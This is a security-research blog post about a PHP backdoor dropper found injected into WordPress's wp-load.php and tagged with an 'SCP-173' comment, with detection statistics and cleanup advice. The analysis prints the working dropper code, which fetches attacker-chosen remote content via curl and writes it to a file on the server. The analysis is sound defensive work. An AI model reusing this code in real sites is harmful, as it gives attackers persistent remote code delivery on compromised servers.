Code Comments Reveal SCP 173 Malware

  • November 9, 2020
Uncommon Radixes Obfuscation

We sometimes find malware code injections that contain strange code comments, which are normally used by programmers to annotate a section of code — for example, a short description of a feature or functionality for other developers to reference.

Oftentimes, hackers aren’t interested in leaving comments describing how their injected malware works. Instead, they use code comments to add unique identifiers to reference aliases, quotes, threat groups, or sometimes even memes. Unlike defacements, these code comments aren’t intended to be displayed on the infected website and can easily go unnoticed.

What is SCP 173?

As it turns out, SCP 173 is a story/meme entry from the SCP Foundation, a collection of creepypasta style fictional stories dating back to 2007. It’s unknown why a hacker would choose to use it as a code comment at the end of their injection — they may just be a fan and wanted to leave an easter egg.

SCP 173 malware injection in WordPress websites

We began noticing a malware injection that was targeting WordPress installations in the first week of 2020. This injection included a very unique feature: it included a cryptic code comment, SCP-173, at the bottom of the malicious code found injected into the core WordPress file wp-load.php:

function template($loader=''){
    $load = isset($_REQUEST['WordPress']) ? trim($_REQUEST['WordPress']) : '';
    $dirname = isset($_REQUEST['Database']) ? trim($_REQUEST['Database']) : '';
    $wp = curl_init('hxxp://'.$load);
    curl_setopt($wp, CURLOPT_RETURNTRANSFER, 1);
    $once = curl_exec($wp);
    if ($dirname!='') {
      file_put_contents($dirname, $once);
    }
    if (isset($_GET['wp-blog-header'])) {
      echo 'wp-blog-header';
    }
}
template();
//scp-173

Highlighted code comment at the bottom of malware code injection

The malware itself is a PHP backdoor dropper that creates a custom function which uses curl and file_put_contents to download malware from a third party URL. This URL is defined by the attacker in a HTTP request to the infected website.

Variant Usage Eclipses Original

In any case, we have detected and cleaned malware containing this comment over 10,000 times since the beginning of the year on our clients’ websites. This includes variants that began popping up, like the one covered earlier this April.

We have detected and cleaned malware containing the SCP-173 comment over 10,000 times since the beginning of 2020.

Usage stats for SCP-173 Malware
Graph showing detection rate of the SCP-173 commented malware

These variants essentially just use different code to complete the same task as the original malware: the main difference is the type of obfuscation used to make it more difficult for scanners to detect. For whatever reason, however, bad actors did not choose to obfuscate their code comment.

Detection & Mitigation Steps

Droppers are a distinct type of malware that can be quite difficult to detect. Essentially “dropping” malicious components and malware into the compromised system from a third-party source, the variants discussed in this post should be considered a serious threat to you and your website visitors. Since this malicious code is a PHP backdoor, it is best detected using a server side scanner that can identify the file.

If you believe your site has been infected with a malware dropper or you’ve located malicious code with a SCP-173 comment and you need a hand to clean it up we’re here to help.

Luke Leal is a member of the Malware Research team and joined the company in 2015. Luke's main responsibilities include threat research and malware analysis, which is used to improve our tools. His professional experience covers over eight years of deobfuscating malware code and using unique data from it to help in correlating patterns. When he’s not researching infosec issues or working on websites, you might find Luke traveling and learning about new things. Connect with him on Twitter.

Related Tags
Related Categories
You May Also Like